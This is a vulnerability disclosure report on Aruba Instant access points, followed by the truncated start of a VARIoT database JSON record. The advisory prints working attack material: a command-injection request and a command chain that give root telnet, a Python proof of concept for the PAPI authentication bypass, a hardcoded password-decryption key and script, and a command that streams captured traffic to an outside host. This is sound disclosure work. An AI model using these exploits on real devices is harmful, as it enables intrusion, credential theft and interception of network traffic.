Username and password to authenticate with the AP web frontend are transmitted through HTTP GET. This method should not be used in a form that transmits sensitive data, because the data is displayed in clear text in the URL.

GET /swarm.cgi?opcode=login&user=admin&passwd=admin HTTP/1.1

The login URL can potentially appear in Proxy logs, the server logs or browser history. This possibly discloses the authentication data to unauthorized persons.

6. AP: Built in privileged "support" account

The APs provide a built in system account called "support". When connected to the restricted shell of the AP via SSH, issuing the command "support", triggers a password request:

00:0b:86:XX:XX:XX# support Password:

A quick internet search clarified, that this password is meant for use by Aruba engineers only: http://community.arubanetworks.com/t5/Unified-Wired-Wireless-Access/OS5-0-support-password/td-p/26760

Further research on that functionality lead to the conclusion that this functionality provides root-privileged shell access to the underlying operating system of the AP, given the correct password is entered.

7. AP: Static password hash for support account

The password hash for the "support" account mentioned in vulnerability #6 is stored in plaintext on the AP.

$ strings /aruba/bin/cli | grep ^bc5 bc54907601c92efc0875233e121fd3f1cebb8b95e2e3c44c14

Random sampling of different versions of Firmware images available on Aruba's website confirmed that the password hash is identical for all versions. The password check validating a given "support" password is based on the following algorithm:

SALT + sha1(SALT + PASSWORD)

Where SALT equals the first 5 bytes of the password hash in binary representation. It is possible to run a brute-force attack on this hash format using JtR with the following input format:

support:$dynamic_25$c92efc0875233e121fd3f1cebb8b95e2e3c44c14$HEX$bc54907601

8. AP: Unusual account identified ("arubasecretadmin")

The AP's system user configuration contains a undocumented account called "arubasecretadmin". This account was the root cause for CVE-2007-0932 and allowed administrative login with a static password.

/etc/passwd: nobody:x:99:99:Nobody:/:/sbin/nologin root:x:0:0:Root:/:/bin/sh admin:x:100:100:Admin:/:/bin/telnet3 arubasecretadmin:x:101:100:Aruba Admin:/:/bin/telnet2 serial:x:102:100:Serial:/:/bin/telnet4

Further tests indicated that login with this account seems not possible as it is not mapped through Arubas authentication mechanisms. The reason for it being still configured on the system is unknown.

9. AP: Privileged remote code execution

Insufficient checking of parameters allows an attacker to execute commands with root privileges on the AP. The vulnerable parameter is "image_url" which is used in the Firmware update function.

GET /swarm.cgi?opcode=image-url-upgrade&ip=127.0.0.1&oper_id=6&image_url=Aries@http://10.0.0.1/?"/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-C+/etc/mini_httpd.conf"&auto_reboot=false&refresh=true&sid=OWsiU5MM7DxVf9FRWe3P&nocache=0.9368100591919084 HTTP/1.1

The above example starts a new instance of mini_httpd on tcp/1234, which allows browsing the AP's filesystem. The following list of commands, if executed in order, start a telnet service that allows passwordless root login.

killall -9 utelnetd touch /tmp/telnet_enable echo #!/bin/sh > /bin/login echo /bin/sh >> /bin/login chmod +x /bin/login /sbin/utelnetd

Connecting to the telnet service started by the above command chain:

# telnet 10.0.XX.XX Trying 10.0.XX.XX... Connected to 10.0.XX.XX. Escape character is '^]'. Switching to Full Access /aruba/bin # echo $USER root /aruba/bin #

Potential exploits of this vulnerability can be detected through the AP's log file: [...] Jan 1 02:43:47 cli[2052]: <341004> |AP 00:0b:86:XX:XX:XX2@10.0.XX.XX cli| http://10.0.XX.XX/?"/sbin/utelnetd" [...]

10. AP: Radius passwords allow arbitrary raddb commands

Insufficient checking of the GET parameter "cmd" allows the injection of arbitrary commands and configuration parameters in the raddb configuration.

Example: GET /swarm.cgi?opcode=config&ip=127.0.0.1&cmd=%27user%20foo%20foo%22,my-setting%3d%3d%22blah%20portal%0Ainbound-firewall%0Ano%20rule%0Aexit%0A%27&refresh=false&sid=Lppj9jT2xQmYKqjEx5eP&nocache=0.10862623626107548 HTTP/1.1

/aruba/radius/raddb/users: foo Filter-Id == MAC-GUEST, Cleartext-Password := "foo",my-setting=="blah"

As shown in the above example, inserting a double-quote in the password allows to add additional commands after the password.

11. AP: Unauthenticated disclosure of environment variables

It is possible to request a listing of environment variables by requesting a specific URL on the AP's web server. The request does not require authentication.

GET /swarm.cgi?opcode=printenv HTTP/1.1

HTTP/1.0 200 OK Content-Type:text/plain; charset=utf-8 Pragma: no-cache Cache-Control: max-age=0, no-store

Environment variables

CHILD_INDEX=0 PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/lib SERVER_SOFTWARE= SERVER_NAME=10.0.XX.XX GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.0 SERVER_PORT=4343 REQUEST_METHOD=GET SCRIPT_NAME=/swarm.cgi QUERY_STRING=opcode=printenv REMOTE_ADDR=10.0.XX.XX REMOTE_PORT=58804 HTTP_REFERER=https://10.0.XX.XX:4343/ HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0 HTTP_HOST=10.0.XX.XX:4343

12. AP: Information disclosure by firmware checking functionality

When the AP checks device.arubanetworks.com for a new firmware version, it sends detailed information of the AP in plaintext to the remote host.

POST /firmware HTTP/1.1 Host: device.arubanetworks.com Content-Length: 2 Connection: keep-alive X-Type: firmware-check X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X-OEM-Tag: Aruba X-Mode: IAP X-Factory-Default: Yes X-Current-Version: 6.4.2.6-4.1.1.10_51810 X-Organization: REMOVED (Company Internal Name) X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155 X-Features: 0000100001001000000000000000000000000000000000010000000

13. AP: Unauthenticated automated firmware update requests

The web frontend of the AP provides functionality to initiate an automated firmware update. Doing so triggers the AP to initiate communication with device.arubanetworks.com and automatically download and install a new firmware image. The CGI opcode for that automatic update is "image-server-check" and it was discovered that the "sid" parameter is not checked for this opcode. Therefor an attacker can issue the automatic firmware update without authentication by sending the following GET request to the AP.

GET /swarm.cgi?opcode=image-server-check&ip=127.0.0.1&sid=x

As shown above, the "sid" parameter has to be submitted as part of the URL, but can be set to anything. Although all opcode actions follow the same calling scheme, "image-server-check" was the only opcode where the session ID was not validated.

Combined with other vulnerabilities (#14, #15), this could be exploited to install an outdated, vulnerable firmware on the AP.

14. AP: Firmware updater does not check certificates

The communication between AP and device.arubanetworks.com is secured by using SSL. The AP does not do proper certificate validation for the communication to device.arubanetworks.com. A typical SSL MiTM attack using DNS spoofing and a self-signed certificate allowed interception of the traffic between AP and device.arubanetworks.com.

15. AP: Forceful downgrade of FW versions possible

When checking device.arubanetworks.com for a new firmware image, the AP sends it's current version to the remote host. If there is no new firmware available, device.arubanetworks.com does not provide any download options. If the initial version sent from the AP is modified by an attacker (via MiTM), the remote server will reply with the current firmware version. The AP will then reject that firmware, as it's current version is more recent/the same. Downgrading the version does also not work based on the validation the AP does. This behaviour can be overwritten if an attacker intercepts and modifies the reply from device.arubanetworks.com and adds X-header called "X-Mandatory-Upgrade".

Example of a spoofed reply from device.arubanetworks.com:

HTTP/1.0 200 OK Date: Wed, 11 Nov 2015 12:12:20 GMT Content-Length: 91 Content-Type: text/plain; charset=UTF-8 X-Activation-Key: FXXXXXXX X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e X-Status-Code: success X-Type: firmware-check X-Mandatory-Upgrade: true Connection: close

6.4.2.6-4.1.1.10_51810 23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810

As shown above, the Header "X-Mandatory-Upgrade" was added to the server's reply. This causes the AP to skip its validation checks and accept any firmware version provided, regardless if it is the same or older than the current one.

16. AP: Firmware update check discloses machine certificate

While observing the traffic between an AP and device.arubanetworks.com, it was discovered that the AP discloses it's machine certificate to the remote endpoint.

POST /firmware HTTP/1.1 Host: 10.0.XX.XX Content-Length: 2504 Connection: close X-Type: firmware-check X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X-OEM-Tag: Aruba X-Mode: IAP X-Factory-Default: Yes X-Session-Id: e0b24fb1-e2f7-4e06-9473-1266b50a3fec X-Current-Version: 6.4.2.6-4.1.1.10_51810 X-Organization: REMOVED (Company Internal Name) X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155 X-Features: 0000100001001000000000000000000000000000000000010000000 X-Challenge-Hash: SHA-1

-----BEGIN CERTIFICATE----- MIIGTjCCBTagAwI... [...] -----END CERTIFICATE-----

The certificate sent in the above request is the same (in PEM format) as found under the following path on the AP:

/tmp/deviceCerts/certifiedKeyCert.der

Comparison of the certificate from the HTTP Request and from the AP filesystem:

$ sha256sum dumped-fw-cert.txt certifiedKeyCert.der.pem 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8 dumped-fw-cert.txt 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8 certifiedKeyCert.der.pem

17. AP: Firmware is downloaded via unencrypted connection

Firmware images are downloaded via unencrypted HTTP to the AP. An example reply containing the download paths looks as follows:

HTTP/1.1 200 OK Date: Wed, 11 Nov 2015 13:18:58 GMT Content-Length: 552 Content-Type: text/plain; charset=UTF-8 X-Activation-Key: FXXXXXXX X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e X-Status-Code: success X-Type: firmware-check Connection: close

6.4.2.6-4.1.1.10_51810 25 http://images.arubanetworks.com/fwfiles/ArubaInstant_Centaurus_6.4.2.6-4.1.1.10_51810 30 http://images.arubanetworks.com/fwfiles/ArubaInstant_Taurus_6.4.2.6-4.1.1.10_51810 15 http://images.arubanetworks.com/fwfiles/ArubaInstant_Cassiopeia_6.4.2.6-4.1.1.10_51810 10 http://images.arubanetworks.com/fwfiles/ArubaInstant_Orion_6.4.2.6-4.1.1.10_51810 23 http://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810 26 http://images.arubanetworks.com/fwfiles/ArubaInstant_Pegasus_6.4.2.6-4.1.1.10_51810

An attacker could potentially MiTM connections to images.arubanetworks.com and possibly replace the firmware images downloaded by the AP.

18. AP: Firmware update Challenge/Response does not protect the Client

The update check process between AP and device.arubanetworks.com works as follows:

AP => device.arubanetworks.com POST /firmware X-Type: firmware-check

AP <= device.arubanetworks.com 200 OK X-Session-Id: bd4... X-Challenge: 123123...

AP => device.arubanetworks.com POST /firmware X-Session-Id: bd4...

[machine certificate] [signature]

AP <= device.arubanetworks.com 200 OK X-Session-Id: bd4...

    [firmware image urls]

When inspecting the communication process carefully, it is clear that the final response from device.arubanetworks.com does not contain any (cryptographic) signature. An attacker could impersonate device.arubanetworks.com, send an arbitrary challenge, ignore the response and just reply with a list of firmware images. The only thing that has to be kept the same over requests is the X-Session-Id header, which is also sent initially by the remote host and not the AP and therefore under full control of the attacker.

19. AP: Unencrypted private keys and certs

The AP firmware image contains the unencrypted private key and certificate for securelogin.arubanetworks.com issued by GeoTrust and valid until 2017. The key and cert was found under the path /aruba/conf/cpprivkey.pem.

$ openssl x509 -in cpprivkey.pem -text -noout Certificate: Data: Version: 3 (0x2) Serial Number: 121426 (0x1da52) Signature Algorithm: sha1WithRSAEncryption Issuer: C=US, O=GeoTrust Inc., OU=Domain Validated SSL, CN=GeoTrust DV SSL CA Validity Not Before: May 11 01:22:10 2011 GMT Not After : Aug 11 04:40:59 2017 GMT Subject: serialNumber=lLUge2fRPkWcJe7boLSVdsKOFK8wv3MF, C=US, O=securelogin.arubanetworks.com, OU=GT28470348, OU=See www.geotrust.com/resources/cps (c)11, OU=Domain Control Validated - QuickSSL(R) Premium, CN=securelogin.arubanetworks.com [...]

$ openssl rsa -in cpprivkey.pem -check RSA key ok writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA…. [...] -----END RSA PRIVATE KEY-----

20. AP: Potential signature private key

A potential SSL key was found under the path /etc/sig.key. Based on the header (3082xxxx[02,03]82), the file looks like a SSL key in DER format:

$ xxd etc/sig.key 00000000: 3082 020a 0282 0201 00d9 2d71 db0f decb 0.........-q....

It was not possible to decode the key. Therefore it's not 100% clear if is an actual key or just a garbaged file.

21. AP: PAPI Endpoints exposed to all interfaces

The PAPI endpoint "msgHandler" creates listeners on all interfaces. Therefore it is reachable via wired and wireless connections to the AP. This increases the potential attack surface.

# netstat -nlu | grep :82 udp 0 0 :::8209 ::: udp 0 0 :::8211 :::

Additionally the local ACL table of the AP contains a default firewall rule, permitting any traffic to udp/8209-8211, overwriting any manually set ACL to block access to PAPI:

00:0b:86:XX:XX:XX# show datapath acl 106 Datapath ACL 106 Entries

Flags: P - permit, L - log, E - established, M/e - MAC/etype filter S - SNAT, D - DNAT, R - redirect, r - reverse redirect m - Mirror I - Invert SA, i - Invert DA, H - high prio, O - set prio, C - Classify Media A - Disable Scanning, B - black list, T - set TOS, 4 - IPv4, 6 - IPv6 K - App Throttle, d - Domain DA

1: any any 17 0-65535 8209-8211 P4 [...] 12: any any any P4 00:0b:86:XX:XX:XX#

22. AP: PAPI Endpoint does not validate MD5 signatures

MD5 signature validation for incoming PAPI packets is disabled on the AP:

# ps | grep msgHandler 1988 root 508 S < /aruba/bin/msgHandler -n

# /aruba/bin/msgHandler -h usage: msgHandler [-d] [-n] -d = enable debug prints. -n = disable md5 signatures. -g = disable garbling.

The watchdog service ("nanny") also restarts the PAPI handler with disabled MD5 signature validation:

# grep msgH /aruba/bin/nanny_list RESTART /aruba/bin/msgHandler -n

23. AP: PAPI protocol encrypted with weak encryption algorithm

PAPI packets sent to an AP contain an encrypted payload. The encryption seems to replace the MD5 signature check as described in #4 and used when PAPI is sent from AP to AMP. This might also explain why the PAPI endpoint runs with disabled MD5 signature verification on the AP (see #22).

The following example shows an encrypted PAPI packet for the command "show version" as received by the AP:

0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 97 93 93 93 ................ 0050 a9 97 93 93 92 6e 96 99 93 93 92 95 94 91 93 97 .....n.......... 0060 93 93 93 93 93 93 87 e9 eb e1 fc d0 dc c6 e4 fd ................ 0070 fa e1 f7 e9 d1 a6 f7 e7 c5 eb f1 93 93 9e e0 fb ................ 0080 fc e4 b3 e5 f6 e1 e0 fa fc fd 99 ...........

Important parts of the above packet:

7f 00 00 01 Destination IP (127.0.0.1) 0a 00 00 01 Source IP (10.0.0.1) 3b 60 Destination Port (15200) 3b 7e Source Port (15230) 97 93 93 93-EOF Encrypted PAPI payload

Comparison of the above packet with a typical PAPI packet that is sent from the AP to the AMP quickly highlights the missing 0x00 that are used to pad certain fields of the PAPI payload. These 0x00 seem to be substituted with 0x93, which is a clear indication that the payload is "encrypted" with a 1 byte XOR. As XOR'ing 0x00 with 1 byte results in the same byte, the payload therefore discloses the key used and use of the weak XOR algorithm:

0x00: 00000000

^ 0x93: 10010011 ================ 10010011 (0x93)

The following shows the above PAPI packet for "show version" with its payload decrypted:

0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 3a 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 :............... 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 0d 73 68 irdzB5dtVxb...sh 0080 6f 77 20 76 65 72 73 69 6f 6e 0a ow version.

(The string starting with "zxr..." is a HTTP session ID, see #25 on details how to bypass this).

An example Python function for en-/decrypting PAPI payloads could look like this:

def aruba_encrypt(s): return ''.join([chr(ord(c) ^ 0x93) for c in s])

24. AP: PAPI protocol authentication bypass

Besides it's typical use between different Aruba devices, PAPI is also used as an inter-process communication (IPC) mechanism between the CGI based web frontend and the backend processes on the AP. Certain commands that can be sent via PAPI are only supposed to be used via this IPC interface and not from an external source. Besides the weak "encryption" that is described in #23, some PAPI packets contain a HTTP session ID (SID), that matches the SID issued at login to the web frontend.

Example IPC packet (payload decrypted as shown in #23):

0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 13 73 68 irdzB5dtVxb...sh 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration 0090 0a .

The SID in the example shown is "zxroCOUwnirdzB5dtVxb". The 0x14 before that indicates the length of the 20 byte SID. If the session is expired or an invalid session is specified, the packet is rejected by the PAPI endpoint (msgHandler).

Replacing the 20 byte SID with 20 * 0x00, bypasses the SID check and therefore allows unauthenticated PAPI communication with the AP.

Example IPC packet (Session ID replaced with 20 * 0x00, payload not XOR'ed for readability):

0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... 0060 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 ................ 0070 00 00 00 00 00 00 00 00 00 00 00 00 00 13 73 68 ..............sh 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration 0090 0a

Using the above example, it is possible to request the system configuration from an AP, bypassing all authentication methods.

If the above packet is sent using IPC from the webfrontend cgi to the backend, (localhost) the reply looks like follows:

msg_ref 303 /tmp/.cli_msg_SW9iVE

The cgi binary then reads this file and renders the content in the HTTP reply. If the PAPI packet comes from an external address (instead of localhost) the reply points to the APs web server (10.0.0.26 in this case) instead of /tmp/:

msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh

Access to this file does not require authentication which raises the severity of this vulnerability significantly.

The following Python script is a proof of concept for this vulnerability, sending a "show configuration" packet to an AP with the IP address 10.0.0.26:

import socket def aruba_encrypt(s): return ''.join([chr(ord(c) ^ 0x93) for c in s]) header = ( '\x49\x72\x00\x03\x7f\x00\x00\x01\x0a\x00\x00\x01\x00\x00\x20\x13' '\x3b\x60\x3b\x7e\x20\x04\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ) payload = ( # show configuration '\x04\x00\x00\x00\x40\x04\x00\x00\x01\xfd\x05\x0a\x00\x00\x01\x06' '\x07\x02\x00\x04\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x13\x73\x68\x6f\x77\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61' '\x74\x69\x6f\x6e\x0a' ) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(('', 1337)) sock.sendto(header + aruba_encrypt(payload), ('10.0.0.26', 8211)) buff = sock.recvfrom(4096) print aruba_encrypt(buff[0])

Executing the above PoC:

# python arupapi.py [...]msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh

Downloading the file referenced by the reply returns the full AP configuration, including all users, passwords and settings (no auth is required on the HTTP request either):

# curl -Lk http://10.0.0.26/.cli_msg_n011xh version 6.4.2.0-4.1.1 virtual-controller-country XX virtual-controller-key b49ffREMOVED name instant-XX:XX:XX terminal-access clock timezone none 00 00 rf-band all [...] mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa [...] (full configuration file continues)

For APs running in "managed mode", the above shown exploit does not work. The reason for that is, that these APs don't provide a web server and have only a limited set of commands that can be executed via PAPI.

Additionally, APs in managed mode do not seem to use the XOR based "encryption" or MD5 checksums - there was no authentication/encryption found at all.

One interesting payload for APs in "managed mode" using the limited subset of available commands is the ability to capture traffic and send it to a remote endpoint via UDP. The example command on the controller would be:

(aruba_7030_1) #ap packet-capture raw-start ip-addr 192.168.0.1 100.105.134.45 1337 0 radio 0

This command would send all traffic of AP 192.168.0.1 from the first radio interface in PCAP format to 100.105.134.45:1337. Wrapped in PAPI, the Packet would look like this:

0000 49 72 00 03 c0 a8 00 01 7f 00 00 01 00 00 00 00 Ir.............. 0010 20 21 20 1c 20 04 01 48 14 08 36 b1 00 00 00 00 ! . ..H..6..... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 65 ...............e 0050 78 65 63 75 74 65 43 6f 6d 6d 61 6e 64 4f 62 6a xecuteCommandObj 0060 65 63 74 02 06 02 04 03 00 08 03 00 08 00 00 04 ect............. 0070 38 32 32 35 02 06 02 04 00 00 00 03 00 00 02 00 8225............ 0080 02 01 04 00 00 00 08 00 00 02 41 50 00 00 02 41 ..........AP...A 0090 50 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 55 P...PACKET-CAPTU 00a0 52 45 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 RE...PACKET-CAPT 00b0 55 52 45 00 00 09 52 41 57 2d 53 54 41 52 54 00 URE...RAW-START. 00c0 00 09 52 41 57 2d 53 54 41 52 54 00 00 07 49 50 ..RAW-START...IP 00d0 2d 41 44 44 52 00 00 0b 31 39 32 2e 31 36 38 2e -ADDR...192.168. 00e0 30 2e 31 00 00 09 74 61 72 67 65 74 2d 69 70 00 0.1...target-ip. 00f0 00 0e 31 30 30 2e 31 30 35 2e 31 33 34 2e 34 35 ..100.105.134.45 0100 00 00 0b 74 61 72 67 65 74 2d 70 6f 72 74 00 00 ...target-port.. 0110 04 31 33 33 37 00 00 06 66 6f 72 6d 61 74 00 00 .1337...format.. 0120 01 30 00 00 05 52 41 44 49 4f 00 00 01 30 04 00 .0...RADIO...0.. 0130 00 00 00 02 00 02 01 02 00 02 00 00 00 04 73 65 ..............se 0140 63 61 00 00 04 72 6f 6f 74 ca...root

When sending this packet to an AP running in managed mode, it confirms the command and starts sending traffic to the specified host:

[...]1

25. AP: Broadcast with detailed system information (LLDP)

Aruba APs broadcast detailed system and version information to the wired networks via LLDP (Link Layer Discovery Protocol).

0000 02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e .......z2....... 0010 7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36 z2...x..00:0b:86 0020 3a XX XX 3a XX XX 3a XX XX 0c 3a 41 72 75 62 61 :XX:XX:XX.:Aruba 0030 4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31 OS (MODEL: RAP-1 0040 35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34 55), Version 6.4 0050 2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35 .2.6-4.1.1.10 (5 0060 31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a 1810)........... 0070 00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe .."........eth0. 0080 06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00 ................ 0090 00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00 .........l...... 00a0 12 0f 04 06 76 00 00 ....v..

The broadcast packet contains the APs MAC address, model number and exact firmware version.This detailed information could aid an attacker to easily find and identify potential targets for known vulnerabilities.

26. AP: User passwords are encrypted with a static key

Based on the vulnerability shown in #24 which potentially discloses the password hashes of AP user accounts, the implemented hashing algorithm was tested. CVE-2014-7299 describes the password hashes as "encrypted password hashes". The following line shows the mgmt-user configuration for the user "admin" with password "admin":

mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa

Some testing with various passwords and especially password lengths showed that the passwords are actually encrypted and not hashed (as hash algorithms produce the same length output for different length input):

f9ac59cd431e174fb07539a8a811a1aa # admin d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf # adminadmin

The encryption algorithm used for the above passwords turned out to be 3DES in CBC mode. The encryption algorithm uses a 24 byte static key which is hardcoded on the AP. Sampling of different Firmware versions confirmed that the key is identical for all available versions. The IV required for 3DES consists of 8 random bytes, and is stored as the first 8 byte of the encrypted password. The following Python script can be used to decrypt the above hashes:

import pyDes hashes = ( 'f9ac59cd431e174fb07539a8a811a1aa', # admin 'd7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf' # adminadmin ) key = ( '\x32\x74\x10\x84\x91\x17\x75\x46\x14\x75\x82\x92' '\x43\x49\x04\x59\x18\x69\x15\x94\x27\x84\x30\x03' ) for h in hashes: d = pyDes.triple_des(key, pyDes.CBC, h.decode('hex')[:8], pad='\00') print h, '=>', d.decrypt(h.decode('hex')[8:])

Mitigation

Aruba released three advisories, related to the issues reported here:

http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-006.txt

Following the resolution advises given in those advisories is strongly recommended. These advisories are also available on the Aruba security bulletin:

http://www.arubanetworks.com/support-services/security-bulletins/

For the vulnerabilities related to PAPI, Aruba has made the following document available:

http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/Control_Plane_Security_Best_Practices_1_0.pdf

This doc gives several advises how to remediate the PAPI related vulnerabilities. An update fixing the issues is announced for Q3/2016. For further information there is also a discussion thread in Aruba's Airheads Community Forum:

http://community.arubanetworks.com/t5/AAA-NAC-Guest-Access-BYOD/Security-vulnerability-advisories/m-p/266095#M25840

Author

The vulnerabilities were discovered by Sven Blumenstein from Google Security Team.

Timeline

2016/01/22 - Security report sent to sirt@arubanetworks.com with 90 day disclosure deadline (2016/04/22). 2016/01/22 - Aruba acknowledges report and starts working on the issues. 2016/02/01 - Asking Aruba for ETA on detailed feedback. 2016/02/03 - Detailed feedback for all reported vulnerabilities received. 2016/02/16 - Answered several questions from the feedback, asked Aruba for patch ETA. 2016/02/29 - Pinged for patch ETA. 2016/03/08 - Pinged for patch ETA. 2016/03/12 - Received detailed list with approx. ETA for patch releases and current status. 2016/03/21 - Aruba asks for extension of 90 day disclosure deadline. 2016/03/24 - Asked Aruba for exact patch release dates. 2016/04/02 - Aruba confirmed 4.2.x branch update for 2016/04/15, 4.1.x branch update for 2016/04/30 (past 90 day deadline). 2016/04/14 - 14 day grace period for disclosure was granted, according to the disclosure policy. New disclosure date was set to 2016/05/06. 2016/05/02 - Asking for status of still unreleased 'end of April' update. 2016/05/02 - Aruba confirmed availability of update on 2016/05/09 (after grace period). 2016/05/03 - Aruba released three advisories on http://www.arubanetworks.com/support-services/security-bulletins/ 2016/05/06 - Public disclosure

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1251",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "aruba instant",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arubanetworks",
        "version": "4.2.3.1"
